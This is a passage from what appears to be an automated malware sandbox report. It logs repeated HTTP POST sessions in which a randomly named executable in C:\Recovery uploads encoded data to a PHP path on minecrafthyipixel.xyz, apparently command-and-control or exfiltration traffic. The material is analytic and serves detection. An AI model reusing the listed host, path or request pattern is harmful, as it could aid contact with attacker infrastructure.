                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2034e39676f-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:42:44.129601002 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49764 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:42:44.655472040 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:42:44.761169910 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:44.766926050 CEST2512OUTData Raw: 57 5a 5e 5d 59 43 54 5f 5c 5e 59 59 57 56 58 5c 54 55 5f 59 54 5e 53 59 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WZ^]YCT_\^YYWVX\TU_YT^SY^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%_%>5X0]')V=7X&R%]1#">T>+$4< .$[. X !
Apr 19, 2024 13:42:45.123068094 CEST | 627 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:45 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dy%2B0wXTrq3pvFSMpQbbQXJ%2FLqFRJgijakEnS6%2B2JjUao8AUU3%2FPF%2BvhG6C%2FCj9LIP4ioXRizSMkFhHwJk7Gm3ABXmNGhfl0lwZ1seOFKZEnb%2F177NGDMwKhQyJu8SzglnoTQymbGU0s%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2096f4d457e-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:42:45.123131990 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49765 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:42:46.594906092 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2180
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:42:46.699615002 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:46.699899912 CEST2180OUTData Raw: 57 5c 5e 5b 5c 40 54 5a 5c 5e 59 59 57 57 58 59 54 52 5f 5a 54 5d 53 58 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W\^[\@TZ\^YYWWXYTR_ZT]SX^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%2.!54$3'^'=>$1$S%8-7"T*7[#Z0/5$[. X -
Apr 19, 2024 13:42:46.957077980 CEST | 776 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:46 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OYWnPkQ3zlvpRQaX%2BiOhg9UHCPin62n6Vw9%2Ffkr4oOZJNrSNNe%2F9tTm%2B%2BAYQpTR%2BvQEraVqxz1obWCuc8NBX26XMkkZsEAUrlz%2FsfUJ8dzm9l6Sw4UGum63z4ouFyLcYVXcqzSwpnFc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca215884144f7-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 39 38 0d 0a 01 15 24 59 27 08 35 01 21 5c 2c 01 2b 23 29 02 3d 27 2e 06 2a 29 25 14 37 03 30 52 2f 29 2b 04 3e 3b 08 5d 31 20 32 0e 27 04 2c 53 31 1a 21 59 00 1a 3a 04 20 3c 0c 03 39 00 2d 58 28 57 22 03 37 32 20 07 2b 2d 21 51 20 16 3f 5e 28 2d 22 0f 2f 06 2f 0a 3c 01 3a 06 2f 24 36 14 21 2b 2c 52 09 12 25 55 3c 06 23 02 27 30 2d 50 37 22 37 00 28 06 32 5c 27 5d 2c 12 31 33 0a 14 2d 22 2d 09 26 2e 39 55 3e 3a 24 54 34 12 08 08 25 2e 2e 5e 2c 0c 2b 48 05 30 54 57 0d 0a
                                                                                                                                    Data Ascii: 98$Y'5!\,+#)='.*)%70R/)+>;]1 2',S1!Y: <9-X(W"72 +-!Q ?^(-"//<:/$6!+,R%U<#'0-P7"7(2\'],13-"-&.9U>:$T4%..^,+H0TW
Apr 19, 2024 13:42:46.957139015 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49766 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:42:46.720484972 CEST | 362 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
Apr 19, 2024 13:42:46.825110912 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:46.825397968 CEST2512OUTData Raw: 57 5f 5b 5e 59 40 51 5f 5c 5e 59 59 57 53 58 58 54 55 5f 5b 54 5b 53 5c 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W_[^Y@Q_\^YYWSXXTU_[T[S\^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&1-"+'#;[3>^<'),181#=*8;_"/?9$[. X 5
Apr 19, 2024 13:42:47.097349882 CEST | 615 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:47 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KDgboZgJgqQvTU62ZGNFnhxAY6yy4xvDJGk8y53q7lafVFpBfmnmiQtAhCMjwJwhAY7A5IW9ZYLvDbjfzE0bgsjdiiqVzmKzTFPRHf31B0Ak0iQ9DrpeI3vT7WhxpZVKdiKvp9Rv%2BCk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2165feeb06a-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:42:47.097381115 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49767 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:42:47.326900959 CEST | 362 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
Apr 19, 2024 13:42:47.431791067 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:47.435801983 CEST2512OUTData Raw: 57 5d 5b 59 59 46 54 5d 5c 5e 59 59 57 55 58 5e 54 51 5f 58 54 59 53 56 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W][YYFT]\^YYWUX^TQ_XTYSV^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&2-"S ;<X& ^0("=^8%*?&14"6*< /8-5$[. X -
Apr 19, 2024 13:42:47.804562092 CEST | 623 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:47 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OVEcZxch1zseBaYWkGpXpImvqAlsd1G0j6QZ9pGaH%2BnVDZoI5VtFwr27Jrob36NXDgWS72Hdy2B8ULuotdBR6AzTeFkp41o%2BdVYNTBDSZ%2F6zWB6FN4%2Bf4n3urw7ReFjjJl%2FzgGbMYhw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca21a280cb0b8-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:42:47.804625988 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49768 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:42:48.049266100 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:42:48.153839111 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:42:48.154284000 CEST | 2512 | OUT | Data Raw: 57 5a 5e 5f 59 43 51 5f 5c 5e 59 59 57 52 58 5a 54 56 5f 5d 54 5c 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WZ^_YCQ_\^YYWRXZTV_]T\S[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%[&>6;Y$ ;^'+&)']1_3&; 2*>;_409$[. X 1
Apr 19, 2024 13:42:48.517513990 CEST | 625 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:48 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5JoJ8AKB5MLXFb7liyceJ4TyTFetIpS%2FmDj8cjHR5a0Ebq2M%2BeM9REHq7%2B3NiOOYqERoTo9p8%2BLuaXT4GUGO4n9B5t2PSyNanVaoZsETtT8v%2B4EHJBx2SUKEwdH9Dud51PW4%2Bn2UDVU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca21ea8e244f7-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:42:48.517577887 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49769 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:42:48.756247044 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:42:48.861033916 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:42:48.861207008 CEST | 2512 | OUT | Data Raw: 57 59 5e 5d 59 4a 54 5e 5c 5e 59 59 57 5e 58 53 54 51 5f 56 54 5a 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WY^]YJT^\^YYW^XSTQ_VTZS[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&15+3$;5=+?1<2;1!"P>;4<(]-$[. X
Apr 19, 2024 13:42:49.271919012 CEST | 619 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:49 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=35EeB7dLm4RSaOEH6kHTwNtcr95%2F1MiYU5GDR9wMuDyOn4yvOJ%2FbcNODDNbxdyEA21WNVI1K4VfVP5GXn8PLJoNWkxrN9Evah937iBdnyeeUKh%2FrtJVpfYruT7jsFLEea2IFsGNzrgk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2230e01674e-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:42:49.271981955 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49770 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:42:49.498908043 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:42:49.603596926 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:42:49.603746891 CEST | 2512 | OUT | Data Raw: 57 5a 5e 59 59 4a 51 58 5c 5e 59 59 57 55 58 5b 54 55 5f 58 54 59 53 57 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WZ^YYJQX\^YYWUX[TU_XTYSW^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%_2-."84Y$'_0(6=;#'9(S&1!">Q*/]7,8/5$[. X -
Apr 19, 2024 13:42:49.974124908 CEST | 619 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:49 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3CHFKrKJk0l%2FCbb22eUE55ASlFOGLelhmogNzK9PitIMcFikV4LI6u3pzwIhtyY6eQn0djZDL3S67ouzn7Zb98%2BZ0m5P2LJBvejxdTFzTkruGztPwTD2sE8YsHVoC1f%2Fz3an2y7ytTk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca227bbcb07c2-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:42:49.974186897 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 49771 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:42:50.203712940 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:42:50.308199883 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:42:50.308363914 CEST | 2512 | OUT | Data Raw: 57 5b 5e 5b 5c 46 51 5a 5c 5e 59 59 57 5f 58 5e 54 5a 5f 5a 54 5e 53 5c 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W[^[\FQZ\^YYW_X^TZ_ZT^S\^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%[2=>!4'00$1U)#1:0R%;672)*(?4$^9$[. X
Apr 19, 2024 13:42:50.572441101 CEST | 627 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:50 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z6x%2FyMs5xNUMLIRG5YjvQNe4kS2CSkO5S4e8vZ9BO9XYwkn2pRL%2BdrlWn%2BB2dKp%2F%2FD8Eu6eHkp5nJCwhYEWvS%2BlPVBsFmtL7eNzC0oXwSpvo0P0qhDK9Qu%2Fpk3sKOwYH8UoiMFe4KnI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca22c18cdb0d6-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:42:50.572505951 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 49772 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:42:50.817934990 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:42:50.922333002 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:42:50.922662973 CEST | 2512 | OUT | Data Raw: 52 5f 5b 5f 59 4a 54 59 5c 5e 59 59 57 5e 58 58 54 57 5f 5f 54 59 53 5d 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R_[_YJTY\^YYW^XXTW__TYS]^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&'-66+$03['(1T); &)<U%+S 2%*?#\.%$[. X
Apr 19, 2024 13:42:51.285429001 CEST | 617 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:51 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
